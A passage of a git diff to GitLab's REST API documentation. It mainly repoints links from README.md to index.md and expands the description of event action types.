rights) | @@ -383,7 +383,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of an snippet | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -406,7 +406,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of an snippet | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -428,7 +428,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `snippet_id` | integer | yes | The ID of an snippet | | `discussion_id` | integer | yes | The ID of a discussion | | `note_id` | integer | yes | The ID of a discussion note | @@ -449,7 +449,7 @@ GET /groups/:id/epics/:epic_id/discussions | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | ```json @@ -548,7 +548,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `discussion_id` | integer | yes | The ID of a discussion item | @@ -569,7 +569,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `body` | string | yes | The content of the thread | | `created_at` | string | no | Date time string, ISO 8601 formatted, such as `2016-03-11T03:45:40Z` (requires administrator or project/group owner rights) | @@ -581,7 +581,7 @@ curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitla ### Add note to existing epic thread Adds a new note to the thread. This can also -[create a thread from a single comment](../user/discussions/#start-a-thread-by-replying-to-a-standard-comment). +[create a thread from a single comment](../user/discussions/#create-a-thread-by-replying-to-a-standard-comment). ```plaintext POST /groups/:id/epics/:epic_id/discussions/:discussion_id/notes @@ -591,7 +591,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -614,7 +614,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -636,7 +636,7 @@ Parameters: | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `epic_id` | integer | yes | The ID of an epic | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -657,7 +657,7 @@ GET /projects/:id/merge_requests/:merge_request_iid/discussions | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | ```json @@ -820,7 +820,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `discussion_id` | integer | yes | The ID of a discussion item | @@ -843,7 +843,7 @@ Parameters for all comments: | Attribute | Type | Required | Description | | ---------------------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `body` | string | yes | The content of the thread | | `commit_id` | string | no | SHA referencing commit to start this thread on | @@ -954,7 +954,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `discussion_id` | integer | yes | The ID of a thread | | `resolved` | boolean | yes | Resolve/unresolve the discussion | @@ -966,7 +966,7 @@ curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab ### Add note to existing merge request thread Adds a new note to the thread. This can also -[create a thread from a single comment](../user/discussions/#start-a-thread-by-replying-to-a-standard-comment). +[create a thread from a single comment](../user/discussions/#create-a-thread-by-replying-to-a-standard-comment). ```plaintext POST /projects/:id/merge_requests/:merge_request_iid/discussions/:discussion_id/notes @@ -976,7 +976,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -999,7 +999,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -1028,7 +1028,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `merge_request_iid` | integer | yes | The IID of a merge request | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -1049,7 +1049,7 @@ GET /projects/:id/commits/:commit_id/discussions | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `commit_id` | integer | yes | The ID of a commit | ```json @@ -1192,7 +1192,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `commit_id` | integer | yes | The ID of a commit | | `discussion_id` | integer | yes | The ID of a discussion item | @@ -1213,7 +1213,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `commit_id` | integer | yes | The ID of a commit | | `body` | string | yes | The content of the thread | | `created_at` | string | no | Date time string, ISO 8601 formatted, such as `2016-03-11T03:45:40Z` (requires administrator or project/group owner rights) | @@ -1247,7 +1247,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `commit_id` | integer | yes | The ID of a commit | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -1270,7 +1270,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `commit_id` | integer | yes | The ID of a commit | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | @@ -1298,7 +1298,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `commit_id` | integer | yes | The ID of a commit | | `discussion_id` | integer | yes | The ID of a thread | | `note_id` | integer | yes | The ID of a thread note | diff --git a/doc/api/dora/metrics.md b/doc/api/dora/metrics.md index 99826550b61..38f1f50839e 100644 --- a/doc/api/dora/metrics.md +++ b/doc/api/dora/metrics.md @@ -22,7 +22,7 @@ GET /projects/:id/dora/metrics | Attribute | Type | Required | Description | |-------------- |-------- |----------|----------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding) can be accessed by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding) can be accessed by the authenticated user. | | `metric` | string | yes | The [metric name](../../user/analytics/ci_cd_analytics.md#supported-metrics-in-gitlab). One of `deployment_frequency` or `lead_time_for_changes`. | | `start_date` | string | no | Date range to start from. ISO 8601 Date format, for example `2021-03-01`. Default is 3 months ago. | | `end_date` | string | no | Date range to end at. ISO 8601 Date format, for example `2021-03-01`. Default is the current date. | @@ -62,7 +62,7 @@ GET /groups/:id/dora/metrics | Attribute | Type | Required | Description | |-------------- |-------- |----------|----------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../README.md#namespaced-path-encoding) can be accessed by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../index.md#namespaced-path-encoding) can be accessed by the authenticated user. | | `metric` | string | yes | The [metric name](../../user/analytics/ci_cd_analytics.md#supported-metrics-in-gitlab). One of `deployment_frequency` or `lead_time_for_changes`. | | `start_date` | string | no | Date range to start from. ISO 8601 Date format, for example `2021-03-01`. Default is 3 months ago. | | `end_date` | string | no | Date range to end at. ISO 8601 Date format, for example `2021-03-01`. Default is the current date. | diff --git a/doc/api/environments.md b/doc/api/environments.md index 4c93b3b15d5..25690cc099a 100644 --- a/doc/api/environments.md +++ b/doc/api/environments.md @@ -17,7 +17,7 @@ GET /projects/:id/environments | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | no | Return the environment with this name. Mutually exclusive with `search` | | `search` | string | no | Return list of environments matching the search criteria. Mutually exclusive with `name` | | `states` | string | no | List all environments that match a specific state. Accepted values: `available` or `stopped`. If no state value given, returns all environments. | @@ -48,7 +48,7 @@ GET /projects/:id/environments/:environment_id | Attribute | Type | Required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `environment_id` | integer | yes | The ID of the environment | ```shell @@ -159,7 +159,7 @@ POST /projects/:id/environments | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the environment | | `external_url` | string | no | Place to link to for this environment | @@ -192,7 +192,7 @@ PUT /projects/:id/environments/:environments_id | Attribute | Type | Required | Description | | --------------- | ------- | --------------------------------- | ------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `environment_id` | integer | yes | The ID of the environment | | `name` | string | no | The new name of the environment | | `external_url` | string | no | The new `external_url` | @@ -224,7 +224,7 @@ DELETE /projects/:id/environments/:environment_id | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `environment_id` | integer | yes | The ID of the environment | ```shell @@ -241,7 +241,7 @@ POST /projects/:id/environments/:environment_id/stop | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | | `environment_id` | integer | yes | The ID of the environment | ```shell diff --git a/doc/api/epic_issues.md b/doc/api/epic_issues.md index 3644375ad0a..dfc54cd81aa 100644 --- a/doc/api/epic_issues.md +++ b/doc/api/epic_issues.md @@ -16,7 +16,7 @@ If the Epics feature is not available, a `403` status code is returned. ## Epic Issues pagination -API results [are paginated](README.md#pagination). Requests that return +API results [are paginated](index.md#pagination). Requests that return multiple issues default to returning 20 results at a time. ## List issues for an epic @@ -29,7 +29,7 @@ GET /groups/:id/epics/:epic_iid/issues | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic. | ```shell @@ -124,7 +124,7 @@ POST /groups/:id/epics/:epic_iid/issues/:issue_id | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic. | | `issue_id` | integer/string | yes | The ID of the issue. | @@ -230,7 +230,7 @@ DELETE /groups/:id/epics/:epic_iid/issues/:epic_issue_id | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | -----------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic. | | `epic_issue_id` | integer/string | yes | The ID of the issue - epic association. | @@ -336,7 +336,7 @@ PUT /groups/:id/epics/:epic_iid/issues/:epic_issue_id | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | -----------------------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic. | | `epic_issue_id` | integer/string | yes | The ID of the issue - epic association. | | `move_before_id` | integer/string | no | The ID of the issue - epic association that should be placed before the link in the question. | diff --git a/doc/api/epic_links.md b/doc/api/epic_links.md index e570b9f31cf..5d8a92d0263 100644 --- a/doc/api/epic_links.md +++ b/doc/api/epic_links.md @@ -28,7 +28,7 @@ GET /groups/:id/epics/:epic_iid/epics | Attribute | Type | Required | Description | | ---------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer | yes | The internal ID of the epic. | ```shell @@ -82,7 +82,7 @@ POST /groups/:id/epics/:epic_iid/epics/:child_epic_id | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer | yes | The internal ID of the epic. | | `child_epic_id` | integer | yes | The global ID of the child epic. Internal ID can't be used because they can conflict with epics from other groups. | @@ -135,7 +135,7 @@ POST /groups/:id/epics/:epic_iid/epics | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer | yes | The internal ID of the (future parent) epic. | | `title` | string | yes | The title of a newly created epic. | | `confidential` | boolean | no | Whether the epic should be confidential. Parameter is ignored if `confidential_epics` feature flag is disabled. Defaults to the confidentiality state of the parent epic. | @@ -169,7 +169,7 @@ PUT /groups/:id/epics/:epic_iid/epics/:child_epic_id | Attribute | Type | Required | Description | | ---------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `epic_iid` | integer | yes | The internal ID of the epic. | | `child_epic_id` | integer | yes | The global ID of the child epic. Internal ID can't be used because they can conflict with epics from other groups. | | `move_before_id` | integer | no | The global ID of a sibling epic that should be placed before the child epic. | @@ -226,7 +226,7 @@ DELETE /groups/:id/epics/:epic_iid/epics/:child_epic_id | Attribute | Type | Required | Description | | --------------- | -------------- | -------- | ------------------------------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `epic_iid` | integer | yes | The internal ID of the epic. | | `child_epic_id` | integer | yes | The global ID of the child epic. Internal ID can't be used because they can conflict with epics from other groups. | diff --git a/doc/api/epics.md b/doc/api/epics.md index d501d61bfb8..263cfe5806e 100644 --- a/doc/api/epics.md +++ b/doc/api/epics.md @@ -37,7 +37,7 @@ fields `start_date_is_fixed` and `due_date_is_fixed`, and four date fields `star By default, `GET` requests return 20 results at a time because the API results are paginated. -Read more on [pagination](README.md#pagination). +Read more on [pagination](index.md#pagination). WARNING: > `reference` attribute in response is deprecated in favour of `references`. @@ -60,11 +60,11 @@ GET /groups/:id/epics?state=opened | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | --------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `author_id` | integer | no | Return epics created by the given user `id` | | `labels` | string | no | Return epics matching a comma separated list of labels names. Label names from the epic group or a parent group can be used | | `with_labels_details` | boolean | no | If `true`, response returns more details for each label in labels field: `:name`, `:color`, `:description`, `:description_html`, `:text_color`. Default is `false`. Available in [GitLab 12.7](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/21413) and later | -| `order_by` | string | no | Return epics ordered by `created_at` or `updated_at` fields. Default is `created_at` | +| `order_by` | string | no | Return epics ordered by `created_at`, `updated_at`, or `title` fields. Default is `created_at` | | `sort` | string | no | Return epics sorted in `asc` or `desc` order. Default is `desc` | | `search` | string | no | Search epics against their `title` and `description` | | `state` | string | no | Search epics against their `state`, possible filters: `opened`, `closed` and `all`, default: `all` | @@ -190,7 +190,7 @@ GET /groups/:id/epics/:epic_iid | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic. | ```shell @@ -263,7 +263,7 @@ POST /groups/:id/epics | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `title` | string | yes | The title of the epic | | `labels` | string | no | The comma separated list of labels | | `description` | string | no | The description of the epic. Limited to 1,048,576 characters. | @@ -345,7 +345,7 @@ PUT /groups/:id/epics/:epic_iid | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic | | `title` | string | no | The title of an epic | | `description` | string | no | The description of an epic. Limited to 1,048,576 characters. | @@ -420,7 +420,7 @@ DELETE /groups/:id/epics/:epic_iid | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer/string | yes | The internal ID of the epic. | ```shell @@ -439,7 +439,7 @@ POST /groups/:id/epics/:epic_iid/todo | Attribute | Type | Required | Description | |-------------|---------|----------|--------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `epic_iid` | integer | yes | The internal ID of a group's epic | ```shell diff --git a/doc/api/error_tracking.md b/doc/api/error_tracking.md index 306383c2de7..fbfd2a69ef7 100644 --- a/doc/api/error_tracking.md +++ b/doc/api/error_tracking.md @@ -21,7 +21,7 @@ GET /projects/:id/error_tracking/settings | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/1/error_tracking/settings" @@ -48,7 +48,7 @@ PATCH /projects/:id/error_tracking/settings | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) owned by the authenticated user. | | `active` | boolean | yes | Pass `true` to enable the already configured error tracking settings or `false` to disable it. | ```shell diff --git a/doc/api/events.md b/doc/api/events.md index 49d99cc43fe..7088eb65bd4 100644 --- a/doc/api/events.md +++ b/doc/api/events.md @@ -10,20 +10,52 @@ info: To determine the technical writer assigned to the Stage/Group associated w ### Action Types -Available action types for the `action` parameter are: +Available types for the `action` parameter, and the resources that might be affected: - `approved` -- `created` -- `updated` + - Merge request - `closed` -- `reopened` -- `pushed` -- `commented` -- `merged` -- `joined` -- `left` + - Epic + - Issue + - Merge request + - Milestone +- `commented` on any `Noteable` record. + - Alert + - Commit + - Design + - Issue + - Merge request + - Snippet +- `created` + - Design + - Epic + - Issue + - Merge request + - Milestone + - Project + - Wiki page - `destroyed` + - Design + - Milestone + - Wiki page - `expired` + - Project membership +- `joined` + - Project membership +- `left` + - Project membership +- `merged` + - Merge request +- `pushed` commits to (or deleted commits from) a repository, individually or in bulk. + - Project +- `reopened` + - Epic + - Issue + - Merge request + - Milestone +- `updated` + - Design + - Wiki page Note that these options are in lower case. @@ -283,7 +315,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `project_id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding) | +| `project_id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding) | | `action` | string | no | Include only events of a particular [action type](#action-types) | | `target_type` | string | no | Include only events of a particular [target type](#target-types) | | `before` | date | no | Include only events created before a particular date. [View how to format dates](#date-formatting). | diff --git a/doc/api/feature_flag_user_lists.md b/doc/api/feature_flag_user_lists.md index af8b3fcc71e..4306167603d 100644 --- a/doc/api/feature_flag_user_lists.md +++ b/doc/api/feature_flag_user_lists.md @@ -15,7 +15,7 @@ Users with Developer or higher [permissions](../user/permissions.md) can access NOTE: `GET` requests return twenty results at a time because the API results -are [paginated](README.md#pagination). You can change this value. +are [paginated](index.md#pagination). You can change this value. ## List all feature flag user lists for a project @@ -27,7 +27,7 @@ GET /projects/:id/feature_flags_user_lists | Attribute | Type | Required | Description | | --------- | -------------- | -------- | -------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `search` | string | no | Return user lists matching the search criteria. | ```shell @@ -69,7 +69,7 @@ POST /projects/:id/feature_flags_user_lists | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `name` | string | yes | The name of the feature flag. | | `user_xids` | string | yes | A comma separated list of user IDs. | @@ -109,7 +109,7 @@ GET /projects/:id/feature_flags_user_lists/:iid | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `iid` | integer/string | yes | The internal ID of the project's feature flag user list. | ```shell @@ -140,7 +140,7 @@ PUT /projects/:id/feature_flags_user_lists/:iid | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `iid` | integer/string | yes | The internal ID of the project's feature flag user list. | | `name` | string | no | The name of the feature flag. | | `user_xids` | string | no | A comma separated list of user IDs. | @@ -181,7 +181,7 @@ DELETE /projects/:id/feature_flags_user_lists/:iid | Attribute | Type | Required | Description | | ------------------- | ---------------- | ---------- | ---------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](index.md#namespaced-path-encoding). | | `iid` | integer/string | yes | The internal ID of the project's feature flag user list | ```shell diff --git a/doc/api/feature_flags.md b/doc/api/feature_flags.md index 50cb9b1141e..b40a3994dbf 100644 --- a/doc/api/feature_flags.md +++ b/doc/api/feature_flags.md @@ -16,7 +16,7 @@ Users with Developer or higher [permissions](../user/permissions.md) can access ## Feature Flags pagination By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). ## List feature flags for a project @@ 